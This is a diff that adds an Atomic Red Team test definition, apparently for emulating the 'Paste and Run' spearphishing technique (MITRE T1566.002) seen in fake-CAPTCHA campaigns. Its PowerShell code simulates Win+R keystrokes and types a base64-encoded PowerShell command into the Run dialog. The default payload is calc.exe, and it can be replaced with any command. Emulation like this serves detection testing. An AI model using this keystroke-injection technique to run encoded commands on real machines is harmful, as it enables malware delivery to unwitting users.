diff --git a/atomics/T1566.002/T1566.002.yaml b/atomics/T1566.002/T1566.002.yaml new file mode 100644 index 00000000..e63cf5a3 --- /dev/null +++ b/atomics/T1566.002/T1566.002.yaml @@ -0,0 +1,47 @@ +attack_technique: T1566.002 +display_name: 'Phishing: Spearphishing Link' + +atomic_tests: +- name: Paste and run technique + auto_generated_guid: + description: | + Tests the **Paste and Run** technique, where users are tricked into running + malicious PowerShell commands by automating the Win+R command to open the + Run dialog and input `encoded PowerShell to execute calc.exe.` + + - [Fake CAPTCHA Campaign](https://medium.com/@ahmed.moh.farou2/fake-captcha-campaign-on-arabic-pirated-movie-sites-delivers-lumma-stealer-4f203f7adabf) + - [From Clipboard to Compromise](https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn) + supported_platforms: + - windows + + input_arguments: + execution_command: + description: The command to execute in the run + type: String + default: 'calc.exe' + executor: + name: powershell + command: | + # Add user32.dll for keybd_event + Add-Type @" + using System; + using System.Runtime.InteropServices; + public class K { + [DllImport("user32.dll")] + public static extern void keybd_event(byte bVk, byte bScan, uint dwFlags, UIntPtr dwExtraInfo); + } + "@ + + # Virtual key codes + $VK_LWIN, $VK_R, $KEYDOWN, $KEYUP = 0x5B, 0x52, 0x0000, 0x0002 + + # Open Run dialog (Win+R) + [K]::keybd_event($VK_LWIN, 0, $KEYDOWN, [UIntPtr]::Zero) + [K]::keybd_event($VK_R, 0, $KEYDOWN, [UIntPtr]::Zero) + [K]::keybd_event($VK_R, 0, $KEYUP, [UIntPtr]::Zero) + [K]::keybd_event($VK_LWIN, 0, $KEYUP, [UIntPtr]::Zero) + + # Short delay for Run dialog + Start-Sleep -Milliseconds 500 + Add-Type -AssemblyName System.Windows.Forms + [System.Windows.Forms.SendKeys]::SendWait("cmd /c powershell -ec " + [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('#{execution_command}')) + "{ENTER}")